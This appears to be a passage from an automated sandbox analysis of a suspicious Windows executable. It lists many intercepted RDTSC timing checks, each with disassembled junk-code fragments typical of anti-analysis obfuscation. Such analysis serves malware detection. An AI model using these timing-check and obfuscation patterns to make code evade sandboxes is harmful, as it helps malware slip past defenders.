Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FB26 second address: B6FB33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FB33 second address: B6FB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FB37 second address: B6FB54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F91A0CEF8B5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FB54 second address: B6FB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FB59 second address: B6FB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3273C second address: B32740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3284B second address: B32876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F91A0CEF8A6h 0x0000000c ja 00007F91A0CEF8A6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F91A0CEF8B4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32D98 second address: B32D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32D9E second address: B32DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32DA3 second address: B32DAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A0CE39ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32E36 second address: B32E61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F91A0CEF8B1h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 24CD235Eh 0x00000012 movzx edx, bx 0x00000015 push D5115FFDh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32E61 second address: B32E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F91A0CE39A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32F98 second address: B32F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32F9C second address: B32FA6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32FA6 second address: B32FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B330EB second address: B330F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B330F6 second address: B33113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F91A0CEF8AAh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33113 second address: B33119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B331EE second address: B331F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B331F2 second address: B33208 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jc 00007F91A0CE39B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33351 second address: B33386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91A0CEF8B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33386 second address: B333D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D3F11h] 0x0000000e push 00000004h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F91A0CE39A8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov di, C197h 0x0000002e xor dword ptr [ebp+12457DC6h], edx 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jno 00007F91A0CE39A6h 0x0000003e je 00007F91A0CE39A6h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33C28 second address: B33C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F91A0CEF8A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33C33 second address: B33C38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33C38 second address: B33CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F91A0CEF8AFh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F91A0CEF8A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 or dword ptr [ebp+122D2D00h], esi 0x0000002e sbb cl, FFFFFFF6h 0x00000031 lea eax, dword ptr [ebp+1247D4F6h] 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F91A0CEF8A8h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33CA5 second address: B33CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33CA9 second address: B33CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B33CAF second address: B1A7D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F91A0CE39A8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3BFCh], ebx 0x0000002c or cl, 00000021h 0x0000002f call dword ptr [ebp+124506A4h] 0x00000035 jp 00007F91A0CE39AEh 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FF31 second address: B6FF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FF35 second address: B6FF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F91A0CE39AAh 0x0000000e jmp 00007F91A0CE39ADh 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B700B5 second address: B700D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91A0CEF8A6h 0x0000000a pop eax 0x0000000b ja 00007F91A0CEF8B2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B700D2 second address: B700F8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91A0CE39C0h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B7079A second address: B707A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B707A0 second address: B707A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76DEF second address: B76E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76E06 second address: B76E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76E0C second address: B76E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B75DC2 second address: B75DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B75DC8 second address: B75DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jc 00007F91A0CEF8A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76096 second address: B7609C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76269 second address: B7627D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F91A0CEF8A6h 0x0000000a jp 00007F91A0CEF8A6h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B7627D second address: B76283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76691 second address: B76697 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76697 second address: B766A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76ADC second address: B76AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76AE2 second address: B76AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76AED second address: B76AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B76AF1 second address: B76AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: AED184 second address: AED188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: AED188 second address: AED196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B7E676 second address: B7E67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B7E67C second address: B7E687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F91A0CE39A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B7E364 second address: B7E368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B7E368 second address: B7E381 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F91A0CE39B0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B80CFA second address: B80CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B80E75 second address: B80E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B85E62 second address: B85E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B85E6D second address: B85E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B851E4 second address: B851F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8548A second address: B8548E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B855DF second address: B855E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B855E3 second address: B855ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B85743 second address: B85749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: AF2353 second address: AF2395 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0CE39A6h 0x00000008 jmp 00007F91A0CE39B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F91A0CE39AAh 0x0000001d jno 00007F91A0CE39A6h 0x00000023 jbe 00007F91A0CE39A6h 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B884A9 second address: B884DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B3h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d je 00007F91A0CEF8A6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F91A0CEF8B0h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B88689 second address: B886A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F91A0CE39B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B887FC second address: B88822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F91A0CEF8A6h 0x0000000f jmp 00007F91A0CEF8B7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B88B23 second address: B88B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8E5AD second address: B8E5D3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A0CEF8A6h 0x00000008 jmp 00007F91A0CEF8B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8CE3B second address: B8CE3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8CE3F second address: B8CE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8CE45 second address: B8CE54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8CFD7 second address: B8CFDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8D174 second address: B8D19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F91A0CE39A6h 0x0000000c jmp 00007F91A0CE39B9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8D19B second address: B8D1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8D1A0 second address: B8D1AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A0CE39AAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B32734 second address: B3273C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8D6FE second address: B8D704 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8D8D1 second address: B8D8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F91A0CEF8A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B8D8DF second address: B8D8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91A0CE39A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B946BB second address: B946FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91A0CEF8A6h 0x0000000a jnc 00007F91A0CEF8ACh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F91A0CEF8ACh 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F91A0CEF8B2h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F91A0CEF8A6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B946FD second address: B94701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B94701 second address: B94710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B94710 second address: B94714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B94714 second address: B9471A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9471A second address: B94724 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0CE39ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B95405 second address: B9540A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B9540A second address: B95410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B95410 second address: B95414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B956DC second address: B956E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
